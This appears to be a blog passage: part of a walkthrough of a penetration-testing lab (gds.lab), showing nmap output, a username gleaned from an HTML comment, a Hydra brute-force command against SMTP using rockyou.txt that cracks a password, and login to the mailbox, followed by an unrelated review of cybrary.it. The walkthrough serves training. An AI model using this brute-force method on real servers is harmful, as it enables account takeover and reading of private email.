|_ Potentially risky methods: PUT DELETE LOCK UNLOCK MKCOL PROPFIND PROPPATCH MOVE COPY REPORT SEARCH ACL MKCALENDAR
|_http-svn-info: ERROR: Script execution failed (use -d to debug)
|_http-title: CommuniGate Pro gds.lab Entrance
| Public Options: OPTIONS, GET, HEAD, POST, PUT, DELETE, LOCK, UNLOCK, MKCOL, PROPFIND, PROPPATCH, MOVE, COPY, REPORT, SEARCH, ACL, MKCALENDAR
| Allowed Methods: OPTIONS, GET, HEAD, POST, PUT, DELETE, LOCK, UNLOCK, MKCOL, PROPFIND, PROPPATCH, MOVE, COPY, REPORT, SEARCH, ACL, MKCALENDAR
| Server Type: CommuniGatePro/6.0.9
| Server Date: Tue, 24 Jan 2017 23:31:59 GMT
| WebDAV type: Unkown
| Directory Listing:
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose|firewall|broadband router|media device
Running (JUST GUESSING): Linux 3.X|2.6.X (91%), WatchGuard Fireware 11.X (91%)
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:watchguard:fireware:11.8 cpe:/o:linux:linux_kernel:2.6 cpe:/o:linux:linux_kernel:3.x
Aggressive OS guesses: Linux 3.2 - 3.8 (91%), Linux 3.8 (91%), WatchGuard Fireware 11.8 (91%), Linux 3.1 - 3.2 (91%), Linux 3.2.0 (90%), Linux 3.0 - 3.2 (88%), Linux 3.5 (88%), Linux 2.6.32 - 2.6.39 (87%), Linux 2.6.18 - 2.6.22 (86%), Linux 2.6.39 (86%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 3 hops
Service Info: Host: gds.lab; OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE (using port 25/tcp)
HOP RTT ADDRESS
1 117.65 ms 10.10.0.1
2 117.82 ms 184.108.40.206
3 118.93 ms 192.168.101.9
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 124.62 seconds
Our initial review of the Nmap scans reveals that the following ports are open:
TCP/22 – SSH
TCP/25 – SMTP (CommuniGate Pro)
TCP/80 – nginx (HTTP)
TCP/443 – nginx (HTTPS)
TCP/8100 – CommuniGate Pro (HTTPD) – Email Server
In a logical fashion, we can’t attack SSH since we don’t have any credentials. SMTP we can use to enumerate users… but that could be tedious if we don’t know how/what the structure of login names are. I can try accessing CommuniGate Pro with an exploit… but version 6.0.9 at the time of writing this was exploit free.
The best bet – and most logical step – would be to explore TCP/80 and TCP/443 and see what the website holds for us. Maybe there are vulnerabilities, comments in the source code, account details, etc.
Before I can continue to the website – just a quick tip of advice – add the following to your /etc/hosts file so you don’t encounter any issues when accessing the website.
root@kali:~# nano /etc/hosts
# The following lines are desirable for IPv6 capable hosts
::1 localhost ip6-localhost ip6-loopback
Once having added store.gds.lab to the hosts file, navigate to the IP of 192.168.101.9 and check out the website.
It seems that the website is that of a Global Data Security company selling Security Software… uhmmmm this is going to be fun!
Quickly digging through the website and its associated links really didn’t provide me with anything valuable. So I decided to move on and try TCP/443.
This is rather interesting! By the looks of it, I think I stumbled on the Blog of Global Data Security. Maybe we can find some account details such as usernames perhaps?
A quick look at the source code for the main page revealed the following:
<!DOCTYPE html><htmllang="en"><head><metacharset="utf-8"><metahttp-equiv="X-UA-Compatible"content="IE=edge"><metaname="viewport"content="width=device-width, initial-scale=1"><metaname="description"content=""><metaname="author"content=""><title>Security Blog by GlobalDataSecurity</title><!-- Bootstrap Core CSS --><linkhref="vendor/bootstrap/css/bootstrap.min.css"rel="stylesheet"><!-- Theme CSS --><!-- Alfred Modlin said use this template --><linkhref="css/clean-blog.min.css"rel="stylesheet"><!-- Custom Fonts --><linkhref="vendor/font-awesome/css/font-awesome.min.css"rel="stylesheet"type="text/css"><linkhref='https://fonts.googleapis.com/css?family=Lora:400,700,400italic,700italic'rel='stylesheet'type='text/css'><linkhref='https://fonts.googleapis.com/css?family=Open+Sans:300italic,400italic,600italic,700italic,800italic,400,300,600,700,800'rel='stylesheet'type='text/css'><!-- HTML5 Shim and Respond.js IE8 support of HTML5 elements and media queries --><!-- WARNING: Respond.js doesn't work if you view the page via file:// --><!--[if lt IE 9]>
Notice the comment?<!-- Alfred Modlin said use this template --> It seems like we got a possible username. Let’s save this for later in case we need it.
I notice that there is a “Contact Us” section on the blog as well, let’s go dig around there!
Well, well what do we have here? Emails! This is great! We now know how the usernames are structured for Global Data Security. So Alfred Modlin should be
Let’s add those usernames to a list for safe keeping.
root@kali:~# hydra -L names -P /usr/share/wordlists/rockyou.txt 192.168.101.9 smtp
Hydra v8.3 (c) 2016 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
Hydra (http://www.thc.org/thc-hydra) starting at 2017-03-17 17:47:43
[INFO] several providers have implemented cracking protection, check with a small wordlist first - and stay legal!
[DATA] max 16 tasks per 1 server, overall 64 tasks, 43033197 login tries (l:3/p:14344399), ~42024 tries per task
[DATA] attacking service smtp on port 25
[STATUS] 221.00 tries/min, 221 tries in 00:01h, 43032976 to do in 3245:20h, 16 active
[STATUS] 215.67 tries/min, 647 tries in 00:03h, 43032550 to do in 3325:33h, 16 active
[STATUS] 215.57 tries/min, 1509 tries in 00:07h, 43031688 to do in 3326:57h, 16 active
[STATUS] 191.07 tries/min, 2866 tries in 00:15h, 43030460 to do in 3753:32h, 16 active
[smtp] host: 192.168.101.9 login: email@example.com password: justdoit
Nice! We got a password for a.modlin! And since we got that… let’s snoop around his emails, shall we?
Finding the Mail Token:
We can access the CommuniGate Pro Email service on TCP/8100.
Once there, let’s login with a.modlin:justdoit and see if we have access.
Bingo! We see that Alfred has two emails, one with the Token, and another one with some kind of App.
Taking a look and see what the app is, it might be useful.
From the email we initially have some extra information about the network. We now know that there is only one SSH Port at 172.16.0.1 and that the app will allow us to see if (The .apk is attached).
I believe we will need it for later exploitation purposes, so let’s save that!
We found the token! Go ahead and submit it on the main page to gain points for it!
I didn’t post the actual token. Because, what would be the fun in that if I did? Go through and actually try to compromise the SMTP Service to get the token!
You learn by practical work, so go through this walkthrough, and the lab – and learn something new!
That’s all for now, stay tuned for the next post to compromise the next Token (2/13) – The Site Token!
In the IT world, there seems to be always a need for certified and/or experienced IT professionals. Cybrary.it is an online resource dedicated to helping people who are interested in this field get the training they need to start or grow their expertise in the IT industry.
All training courses are completely FREE. The site runs off of donations (both financially and through materials) from users and partners/sponsors.
I have personally used cybrary.it and intend to continue. I wouldn’t say it is the one-stop learning location for all IT certifications but it gets very close. The courses offered from basic Comptia A+ to CISSP and advanced hacking, are all well in depth and follow the structure of exam criteria.
I also have completed the PCI/DSS, A+, ITIL Foundation courses and parts of other courses. In my opnion the PCI/DSS course was probably the least extensive one that I have come across during my use (and I’ve been involved with cybrary.it for over a year at this point). Even so, I’d call it a good primer as it exposes the watcher to the basics of the PCI fundamentals, gives a crash course in many of the most used policies, as well as speaks on using Risk management and information security. …and all of this is for FREE. In addition, members of the Cybrary have been writing articles that go into additional topics that are accessible to any registered cybrary.it user.
Registration is free just like the course material and the setup includes creating your own profile. Cybrary.it isn’t just a learning source, but its a community and I’ve seen it grow from just courses and a forum to include hours of reading content submitted by users and companies, a job board, current IT developments, micro certifications and more.
There is much more I could comment on but I don’t want to make this review too lengthy. Perhaps I’ll do another later on a specific element of the site. Regardless of what I choose to do, I know I’ll continue to use cybrary.it extensively for my training needs. I am currently eyeing out Security+ and CCNA.
I challenge you to take a look. There is much more material and training for the IT industry needs there than I could list here in a compact form. So take a look! I’m sure you’ll find something useful.